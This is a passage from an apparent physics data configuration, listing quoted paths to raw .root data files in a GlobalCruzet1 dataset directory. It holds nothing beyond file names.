'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30184FA3-CE1C-DD11-B135-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3022C499-CC1C-DD11-A9F3-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/306C0F0C-C01C-DD11-8997-0016177CA778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30AFFEA2-CE1C-DD11-9650-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30B25C8A-CC1C-DD11-8F44-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30B4DC4C-C41C-DD11-8D66-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32074B83-CA1C-DD11-A8A0-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3279A90D-C01C-DD11-9288-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3288778F-CA1C-DD11-A8F8-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32D57812-C21C-DD11-80A8-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32E8D78D-CA1C-DD11-9B0C-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/342BF7D5-D21C-DD11-B3A7-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34AA2ED9-D21C-DD11-9434-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34B5B163-C41C-DD11-AB48-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34CA75D1-B91C-DD11-B4FD-000423D98930.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/36191416-C21C-DD11-8A6C-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/362838EC-BD1C-DD11-B8C7-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3636B1D0-BB1C-DD11-806E-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/366827C8-D01C-DD11-A7E9-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/36F3E11D-C21C-DD11-A1AF-001617E30D52.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38032FF8-BF1C-DD11-BC36-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/383986EC-BB1C-DD11-987A-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38935E7E-CA1C-DD11-88E5-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38FBE115-C01C-DD11-A373-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38FEBD81-CA1C-DD11-8C28-000423D98804.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3A207592-CA1C-DD11-9F1B-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3A914003-BE1C-DD11-B42F-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3AC9A6A1-CC1C-DD11-9962-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3AD17346-C61C-DD11-B4D1-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3CA07EFF-BD1C-DD11-A85D-0019DB29C614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3CC33988-CA1C-DD11-A9EC-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3EA0B2D0-BB1C-DD11-A7F7-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/404FC1CE-D01C-DD11-84F5-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/42A7E9D1-B91C-DD11-96A0-000423D94908.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/42E5A594-CA1C-DD11-8E72-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4403FC5C-C81C-DD11-8187-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/44200AB3-CE1C-DD11-981F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/460369CC-D01C-DD11-9907-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46285A63-C41C-DD11-8F4C-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4671328A-CC1C-DD11-9B21-001617E30D38.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46E219D1-B91C-DD11-AE70-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46FBF8CE-D21C-DD11-A2EA-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/48541196-CA1C-DD11-9E90-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/485816A4-CC1C-DD11-A10D-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4872EE1D-C01C-DD11-A5FD-000423D98C20.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4885B4F9-BF1C-DD11-89B7-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/48F3F2A2-CE1C-DD11-8DD4-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4A06FFA1-CC1C-DD11-87A2-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4A9CB82A-C21C-DD11-AEE7-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4AD639F8-BB1C-DD11-AF29-000423D944F8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4AFDEF53-C41C-DD11-A04C-001617C3B6DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4C0DF65E-C41C-DD11-9D7F-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4CB55298-CC1C-DD11-A393-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4E3E253C-C61C-DD11-B716-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4E55CAD7-B91C-DD11-9856-000423D986A8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EA7B5F5-BD1C-DD11-892C-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EB6F2E2-BB1C-DD11-B989-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EBAD914-C21C-DD11-9C60-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EE090E8-BB1C-DD11-BC09-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/500D4FD2-D01C-DD11-939D-001617DBD332.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5094F75E-C41C-DD11-B213-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/50F25166-C81C-DD11-85F3-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5226D48D-CA1C-DD11-A560-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/529811ED-BB1C-DD11-B009-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5410534C-C41C-DD11-B43A-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/54770146-C41C-DD11-9790-000423D6CA72.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/549CC491-CC1C-DD11-8EB2-001617DBD472.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/54EC00E7-BD1C-DD11-86E8-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5613B8D3-D21C-DD11-A49D-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/564941D8-D21C-DD11-B75D-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/580242EB-BD1C-DD11-B34E-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5807F882-CA1C-DD11-B19D-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5819A263-C41C-DD11-B93A-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5856C70C-BE1C-DD11-90DF-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58BFC591-CC1C-DD11-9D51-001617C3B6C6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58BFCDE8-BD1C-DD11-924A-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58C248C6-D01C-DD11-B059-0019DB29C620.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5A00E33C-C61C-DD11-B95A-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5A22A0B4-CE1C-DD11-A7BD-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5AB6A96D-C81C-DD11-9224-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5ABCF4EA-BD1C-DD11-BEC4-001617C3B6E8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C00E13C-C61C-DD11-BC62-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C029908-BE1C-DD11-8D92-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C8FF55E-C41C-DD11-A1B7-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EC8D0EF-BD1C-DD11-AF64-001617C3B5E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EDD9A34-C21C-DD11-83C7-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EE95EF0-BD1C-DD11-8A21-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/625095C3-D01C-DD11-9A3D-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62BB3764-C81C-DD11-BBD3-001617E30F58.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62D3B406-BE1C-DD11-A3C3-000423D94AA8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62E3211E-C01C-DD11-93FE-000423D99660.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/666DBCE5-BB1C-DD11-8798-000423D94AA8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/66F8A946-C41C-DD11-92FC-000423D98DB4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/68773EEE-BB1C-DD11-BABD-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A2E651E-C01C-DD11-84C1-000423D94990.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A44B7C8-D01C-DD11-8F4F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A6DB7F0-BB1C-DD11-9956-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6CCACD33-C21C-DD11-A4E2-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6E894A32-C21C-DD11-AD3B-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/703CC249-C41C-DD11-B7EE-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7042ABF9-BB1C-DD11-99CB-000423D996B4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/70929317-C01C-DD11-8762-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/72014426-C21C-DD11-AC2E-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7442701B-C21C-DD11-B0D4-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/74E7AFF1-BB1C-DD11-BDEE-000423D944FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/760CE253-C41C-DD11-9431-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/763379F4-BF1C-DD11-B9FF-000423D6C8E6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7647D092-CA1C-DD11-922E-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/766816D6-BB1C-DD11-BC35-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/769F4256-C41C-DD11-858D-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/76AEBDBF-D01C-DD11-A47D-000423D6CA72.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/76C8B52A-C21C-DD11-BF56-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78B3F914-C01C-DD11-B45B-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78B871C3-D01C-DD11-AE14-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78D879C3-D01C-DD11-AB54-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7AA262D0-B91C-DD11-9AE8-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7C5A8EDE-BB1C-DD11-8883-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7C91A4D1-D01C-DD11-9C38-001617E30D00.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CA38092-CC1C-DD11-B3CD-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CBF8F21-C21C-DD11-AE6F-001617DBD472.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CCAEC8D-CA1C-DD11-ACE0-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CD95E12-C01C-DD11-946F-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CF8CCB7-CE1C-DD11-BBC5-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7E88CB00-BE1C-DD11-A4F2-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/807685B9-CE1C-DD11-BDE9-001617DBD316.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/821564AD-CE1C-DD11-935B-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/827CD5E5-BD1C-DD11-8A9D-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/82E4352D-C21C-DD11-A609-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8408B7F0-BB1C-DD11-8737-000423D98930.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8434B0D0-BB1C-DD11-B3FF-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86B26D4E-C41C-DD11-A476-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86B564D5-BB1C-DD11-8DAC-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86BB41EB-BD1C-DD11-AC05-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/88C52BD1-B91C-DD11-9018-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/88E8E765-C81C-DD11-B9F5-001617C3B6CE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8A50CFD5-BB1C-DD11-A5AC-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8ADC3A47-C61C-DD11-8B91-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C313DA9-CE1C-DD11-886B-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C5B3009-C01C-DD11-9CBD-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C5EEA19-C01C-DD11-87DB-000423D98AF0.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8CDE12B8-CE1C-DD11-B016-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8CF25D88-CC1C-DD11-87AC-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8E7CCBC9-B91C-DD11-9DC7-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8EAAD7EF-BD1C-DD11-87A9-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8EB94A9D-CA1C-DD11-BD37-001617DBCF6A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9002413D-C61C-DD11-8F13-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/904500F6-BF1C-DD11-A72B-000423D6B358.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90650142-C61C-DD11-9D29-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/906666A6-CE1C-DD11-8150-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90C564AD-CE1C-DD11-8CB2-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90D4F325-C21C-DD11-8AE2-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/927D4BCC-B91C-DD11-901B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9436CC91-CC1C-DD11-AAD9-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/94DF6FBE-D01C-DD11-AF80-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9623B3D8-D21C-DD11-87DF-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/96C5EF49-C41C-DD11-924D-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/96FA9F95-CA1C-DD11-B4F2-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9897F7DF-BB1C-DD11-9A1B-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A03A402-C01C-DD11-8445-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A3AAC06-BE1C-DD11-ABCE-001617C3B654.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A3F7F01-BE1C-DD11-9163-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9AECBFAD-CE1C-DD11-8024-001617C3B5F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9CD29BC2-B91C-DD11-AA74-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9CE491F4-BB1C-DD11-99D6-000423D98750.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9E0AB00E-C01C-DD11-B975-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9E3A7467-C81C-DD11-8ED6-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9EEA60D4-B91C-DD11-A2CC-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9EF3B958-C41C-DD11-B6DA-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A039DFF6-BD1C-DD11-B92E-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A054B619-C21C-DD11-B913-001617E30CA4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A0E92059-C41C-DD11-A68C-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A2287EA3-CC1C-DD11-9191-001617C3B5F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A22A0AA2-CC1C-DD11-B64A-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A24F3E0A-C01C-DD11-9FBB-001617C3B6C6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A298BAC8-B91C-DD11-B235-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A2C47E4E-C61C-DD11-9003-001617C3B6CE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4412EE2-BD1C-DD11-91AD-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A441E958-C81C-DD11-87EF-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A45B800F-C01C-DD11-A4C3-001617E30F58.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4743792-CC1C-DD11-8FF3-0019DB29C5FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4956AC1-D01C-DD11-831E-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4C86A24-C21C-DD11-A311-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A600E0DA-BB1C-DD11-A3FA-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A6C9CEAB-CE1C-DD11-9068-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A83BF12B-C21C-DD11-BA3F-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A85100F9-BB1C-DD11-8610-000423D9989E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A85B574E-C41C-DD11-9727-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A89BB268-C81C-DD11-B973-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A8B4ACF4-BF1C-DD11-B38C-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AA0830DB-D21C-DD11-8065-000423D6CA42.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AA22C202-BE1C-DD11-9FB5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AAC9C441-C61C-DD11-8BD3-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/ACA9E015-C21C-DD11-BA35-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE02DC53-C41C-DD11-8FE6-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE0D0D54-C41C-DD11-9BB8-001617C3B6CE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE240861-C81C-DD11-80B8-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE6999EC-BB1C-DD11-8866-000423D98E6C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE7136CC-B91C-DD11-9831-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE86A9B9-D01C-DD11-A29D-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE8F9A49-C41C-DD11-8B66-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B009918A-CA1C-DD11-982D-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B016F7FB-BD1C-DD11-B8B6-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B01F2516-C21C-DD11-8FC3-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B02481F5-BD1C-DD11-8A72-001617E30D4A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B02B64D6-BB1C-DD11-A3CE-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B051A8FB-BD1C-DD11-B7AB-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B0683BFC-BD1C-DD11-B043-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B09FBB45-C21C-DD11-B2EE-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B0A93C4F-C41C-DD11-8736-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B2B62AB9-D01C-DD11-B55B-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B41E2C53-C61C-DD11-A94F-001617DBCF90.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B438131A-C21C-DD11-B626-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4517446-C61C-DD11-ACBC-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4779F8A-CC1C-DD11-BFB1-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4CF580D-C01C-DD11-8B5D-001617E30CC8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B612C72A-C21C-DD11-BD75-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B67DD69E-CE1C-DD11-8F69-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B6897EC8-B91C-DD11-BD5F-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B80F3696-CA1C-DD11-BD90-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B81950D8-D21C-DD11-B36F-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B81B443A-C61C-DD11-A800-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B83C61F5-BD1C-DD11-B5FD-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B8599355-C81C-DD11-A68F-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA002BE5-BB1C-DD11-A279-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA48FBA7-CC1C-DD11-BA37-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA68A5D2-B91C-DD11-8939-000423D98B5C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BAB7A2F5-BD1C-DD11-8CE7-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BAFBE4CF-D01C-DD11-AD5D-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BC03A04C-C61C-DD11-B6C6-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BC58B4B7-CE1C-DD11-B473-0016177CA7A0.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BE3C2165-C41C-DD11-BCB1-001617E30D52.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BE708B20-C01C-DD11-9862-000423D98BC4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BEA65F0C-C01C-DD11-983A-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BEB2F75E-C41C-DD11-A2D1-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C015805E-C81C-DD11-AF4A-001617E30CE8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C02B2DE2-BD1C-DD11-A5FD-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2053F88-CA1C-DD11-890F-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C26F6CB5-CE1C-DD11-A748-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2A2F3D3-D21C-DD11-B7BE-000423D94700.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2BFF2E5-BD1C-DD11-93D1-001617E30D40.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2DC70C3-CC1C-DD11-8234-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C45BCFEF-BB1C-DD11-AF09-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C46CC141-C61C-DD11-9FDA-001617E30D52.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C4E9EB89-CC1C-DD11-AEC2-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C645C5B9-CE1C-DD11-BFD0-001617C3B78C.root',
